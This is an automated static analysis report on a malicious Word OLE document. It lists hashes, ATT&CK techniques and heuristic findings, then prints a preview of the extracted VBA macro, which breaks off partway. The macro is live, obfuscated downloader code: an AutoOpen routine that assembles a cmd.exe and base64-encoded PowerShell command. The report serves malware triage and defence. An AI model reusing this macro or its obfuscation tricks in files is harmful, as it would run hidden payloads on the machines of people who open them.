Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 776784d0a3d71033…

MALICIOUS

Office (OLE)

Size: 73.6 KB
First seen: 2018-09-04
MD5: 0438489d3e723d037bd2fa73b8eee251
SHA-1: 4758495ca6b9f858185256776fc0a352182709a8
SHA-256: 776784d0a3d7103392e5f594272c859330b4b65f676441bb40e56e9affa8283a
Risk score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function, a common technique for executing malicious code as soon as a document is opened. The macro calls the Shell() function to execute a command that is heavily obfuscated through string concatenation. The reconstructed command appears to set environment variables and then execute 'cmd.exe' with various parameters, most likely to download and run a secondary payload.

Heuristics (6)

  • VBA macros detected [medium] (OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
  • OLE document has large unaccounted-for region [high] (OLE_SLACK_ANOMALY)
    OLE file is 75,370 bytes but its declared streams total only 35,461 bytes — 39,909 bytes (53%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13304 bytes
SHA-256: 73c00e40d44cc22d688cc2deb91968d09f88ba6aad21652ac6d6db5def08c06e

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "jjzQflwz"
Function VDwCbH()
On Error Resume Next
mRZjf = CStr(uEMzAO * Tan(XwMTia * Int(hRUWlT * Sqr(70512) / sJvdOK + Fix(32352)) / 50413 * Round(94142 / Log(95439 - EiaLW) + 99206 - OkDPW)) / 67382 + CByte(10046))
FrYWUzj = "md ZwmpJQbMjtq" + "JT zEttfW" + "juKE" + "zILlFOLQ"
aVwDv = CStr(rILCE * Tan(zhGVP * Int(QVzHG * Sqr(96230) / RFAhc + Fix(75632)) / 23425 * Round(46205 / Log(83582 - vdtCGM) + 41697 - IScUh)) / 56593 + CByte(64881))
ujPZOHwnq = "r PQiz" + "LjDjbfA &   " + "  " + "%^c^o^m^" + "S^p" + "^E^c^%     " + "%^c^o^m^S^p^E^" + "c^% " + "    /V    "
ASjYS = CStr(wjdGr * Tan(iPszHw * Int(sWTKI * Sqr(56451) / zfuzXW + Fix(371)) / 55108 * Round(74959 / Log(88032 - SShiMZ) + 98767 - uftad)) / 23601 + CByte(70632))
MifXsziGAk = "     /c " + "  " + "        set " + "%zEHBXFwz"
pdjHa = CStr(ZQTmfj * Tan(aGcwK * Int(idOJuL * Sqr(76183) / NEFQln + Fix(8978)) / 21106 * Round(98390 / Log(12038 - OXtQLZ) + 88111 - ATZQc)) / 36425 + CByte(44854))
ZrmtMbKCfO = "HpCckJH%=aafft" + "bYi" + "o&&set" + " %Ncaas" + "Jirtvqd%=p&&se" + "t %zoHsCCVGF"
obTmw = CStr(MLLOVu * Tan(PPGWMw * Int(lNDkA * Sqr(90059) / OnoczO + Fix(62535)) / 31455 * Round(68899 / Log(60874 - pbLhE) + 93641 - zUkDS)) / 89231 + CByte(30029))
oTKZPvUS = "YI%=o" + "^w&" + "&set %KwUmjB" + "SiECEDkiJ%" + "=SjnM" + "oznD&&set %iz" + "kCpaLTE%=!%" + "NcaasJirt" + "vqd%!&&set %T"
VDwCbH = FrYWUzj + ujPZOHwnq + MifXsziGAk + ZrmtMbKCfO + oTKZPvUS
End Function
Function tqwEiEHjK()
On Error Resume Next
GVaYj = CStr(BAzYXl * Tan(fPzjb * Int(XVFDI * Sqr(12168) / AaBKUt + Fix(25696)) / 52634 * Round(15233 / Log(21250 - LwhnaN) + 18002 - LfTElX)) / 83503 + CByte(84692))
PKudZpjjPt = "cJwzGVf" + "ZMM" + "JiLb%=jzjHC" + "LprWTbsl&&se" + "t %QGfZhjcu%=e" + "^r&&s" + "et %fsDCGj" + "tBEJ%=!%zo"
BARSRD = CStr(bwmDdY * Tan(YEKUfU * Int(urubvA * Sqr(63267) / QmdBU + Fix(50651)) / 14345 * Round(86834 / Log(44554 - swMcbG) + 7732 - jvAbDM)) / 45437 + CByte(16481))
OwbVUJ = "HsCCVG" + "FYI" + "%!&&set " + "%OmRSqjR" + "hafE%=s&&set " + "%VAMIQSDsWizhZ" + "iX%=zhHHzc" + "qRfB&&set %K"
IXrWD = CStr(FizZb * Tan(WQLma * Int(XXRQnX * Sqr(14892) / lVojR + Fix(58143)) / 23841 * Round(38000 / Log(97970 - fXpsG) + 89477 - jckMfp)) / 78236 + CByte(56105))
vwIsFvzESDq = "amYdXV%" + "=he&&set %fHE" + "SSbCDRLO%=ll&&" + "!%izkCpaL" + "TE%!!%" + "fsDCGjtBEJ" + "%!!%QGfZhjcu"
zkorjU = CStr(mTktQ * Tan(zqCRp * Int(DwfRX * Sqr(79896) / uXEFj + Fix(145)) / 11844 * Round(83068 / Log(58170 - fHlLID) + 48655 - BKYft)) / 19575 + CByte(26266))
ilWfiwizNkZ = "%!!%OmRSqjRhafE" + "%!!%KamYdXV%!" + "!%fHESSbCDRLO%!" + "  -e K"
hZdUTR = CStr(cZriN * Tan(tKRTP * Int(KEvvt * Sqr(11240) / WiiPdt + Fix(84909)) / 63048 * Round(35211 / Log(62140 - JINFJ) + 73382 - ULRHA)) / 14229 + CByte(22828))
ozaJt = "ABOAGUAdwA" + "tAE8" + "AYgBqAGUAQwBU" + "ACAAIABzAH" + "kAUwBUA" + "GUAT" + "QAu" + "AGkATwAuAEMAT" + "wBtAFAAc"
mDvmij = CStr(XvXtJ * Tan(oVXad * Int(JGJFu * Sqr(17403) / YtiOib + Fix(7260)) / 99010 * Round(14192 / Log(78480 - fBiukS) + 64920 - cDjqt)) / 63474 + CByte(43540))
VjjojLajdHK = "gBFAFMAcwBJAE" + "8AbgA" + "uAGQARQBmAEwA" + "YQB0A" + "GUAcw" + "B0AFIAZQ"
tqwEiEHjK = PKudZpjjPt + OwbVUJ + vwIsFvzESDq + ilWfiwizNkZ + ozaJt + VjjojLajdHK
End Function
Function wjwdpvTwjYS()
On Error Resume Next
CXcwA = CStr(zLVtht * Tan(GOjjm * Int(cZPVrX * Sqr(60456) / brDkhH + Fix(44466)) / 3164 * Round(53135 / Log(59240 - lCBSZr) + 71488 - wWozKH)) / 72711 + CByte(89234))
VchHmjj = "BB" + "AE0AK" + "ABbAEkAb" + "wAuAE0" + "ARQBtAE" + "8Acg" + "B5AH" + "MAdABSAEUAQQB"
mCkaUw = CStr(TRIzl * Tan(EmCpAs * Int(GqiGii * Sqr(20587) / stcvNr + Fix(28562)) / 49118 * Round(88304 / Log(30213 - FdzHj) + 71532 - BRCzU)) / 12809 + CByte(86247))
uSSWhGRiNIF = "NAF0AWwBzAFkAU" + "wB" + "0AGUAbQAuAGMA" + "Tw" + "BuAFYAZQ" + "ByAFQAXQA6AD"
YwYir = CStr(mlbYfE * Tan(DpMIa * Int(nwGiuV * Sqr(62672) / tkuYWC + Fix(86514)) / 36616 * Round(34742 / Log(2850 - XdTsY) + 66842 - jdwbp)) / 79935 + CByte(88936))
zzRPwOS = "oAZgBSA" + "G8AbQBCAEEA" + "cwBlADYANABzAHQ" + "AcgBJAE4ARwAoAC" + "c
... (truncated)